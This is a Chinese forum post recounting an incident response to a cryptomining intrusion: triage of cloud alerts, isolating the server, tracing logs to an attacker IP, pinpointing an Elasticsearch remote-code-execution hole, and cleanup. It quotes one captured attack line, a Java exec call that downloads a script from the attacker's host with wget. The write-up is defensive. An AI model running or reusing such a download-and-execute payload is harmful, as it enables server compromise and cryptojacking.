一次专有云挖矿事件的应急

论坛 期权论坛 期权     
安全攻守道   2020-3-28 04:31   1324   0
起因:云安全巡检,发现安骑士告警了恶意文件下载和挖矿事件。


[h3]1.判断事件真实性和事件类型[/h3]
  • 发现事件方式:云盾告警
  • 下载恶意程序时间:2月27日 01:15:01
  • 挖矿程序执行事件:2月27日 07:37:46
从事件详情上看,可以判断事件是真实有效的挖矿事件.


截图


[h3]2. 进行阻断隔离[/h3]迅速找到业务方负责人,在确认业务可以短暂隔离的情况下,配置acl只允许我的ip访问服务器。
[h3]3. 入侵溯源[/h3]云盾日志检索时间:2月27日00:00~2月27日01:30,定位黑客是什么方式进来的。
第一步肯定是看ssh是不是有暴力破解和登陆异常,然鹅没有。2月27日00:00到2月28日0:00,只有2条通过堡垒机正常登陆记录,这两条ssh登陆记录是我们上去排查溯源的登陆记录。






检索日志:2月27日01:15~2月27日08:05,定位黑客对操作系统做了哪些操作






从 攻击量来看,攻击从01:30一直持续到早上8点左右。预判黑客是在01:30之前发现漏洞并利用了漏洞得到了系统权限。
通过01:30之前的日志排查,发现某互联网ip大量对服务器各端口发起请求。这非常异常,因为政务网内的业务很少有互联网ip发起大量请求。定位该ip
写这篇文章时间已经隔了20多天,已无具体的截图。总之,0:00~1:00这个区间,只有185.181.10.234这个ip发起了大量异常请求。
然后以185.181.10.234为检索关键字,得到结果可以让我很肯定他就是攻击源。因为他在短时间内,请求了80,8080,9001,8161,9200,9000服务,并且是访问频率异常。
最后通过安全组的排查也核实了一件事情8080,9001,8161,9200,9000没有做任何限制,即互联网上ip可以访问这些端口上的业务。
  • 8080:tomcat
  • 9001:supervisor
  • 9000:fastcgi
  • 9200:elasticsearch
  • 8161:activemq
黑客肯定是通过上面几个端口入侵进来的,对每个应用日志进行分析。tomcat没有暴力破解或者文件上传日志,activemq的日志文件已经有十多天没有更新了,所以也不可能通过activemq漏洞进来。9000和9001先忽略掉,因为不会分析这2个应用日志。
最后查看elasticsearch日志,ll -t通过时间排序,最近被修改的日志是realesate.log,修改时间和被入侵的时间非常匹配。在/var/elastic/logs/re alesate.log发现了异常。





1
java.lang.Runtime().getRuntime=().exec(\"wget http://185.181.10.234/E5D****/init.sh -P /tmp/sssooo\").getText()
很明显了,黑客通过java指令下载了挖矿程序。网上搜了下:elasticsearch低版本存在RCE。
[h3]4.查杀[/h3]
  • 手动查看/etc/cron 和 /etc/crontab,发现了恶意启动项。通过ll -t命令对tmp,elastic,opt,etc/init.d/ /root/sshd_config 进行排查,删除黑客的恶意程序。
  • 安装rkhunter,对服务器进行一个全面检查。
  • 检查该服务器是否对内网横向扫描,通过hitory和netstat判断,结果为:无
  • 7天内重点观察巡检
[h3]5.总结[/h3]本次入侵事件没有数据泄漏迹象,黑客并没有完全控制服务器权限,因为ssh端口他无法连接(做了安全组)。所以本次事件的影响性,占用cpu挖矿。


分享到 :
0 人收藏
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

积分:
帖子:
精华:
期权论坛 期权论坛
发布
内容

下载期权论坛手机APP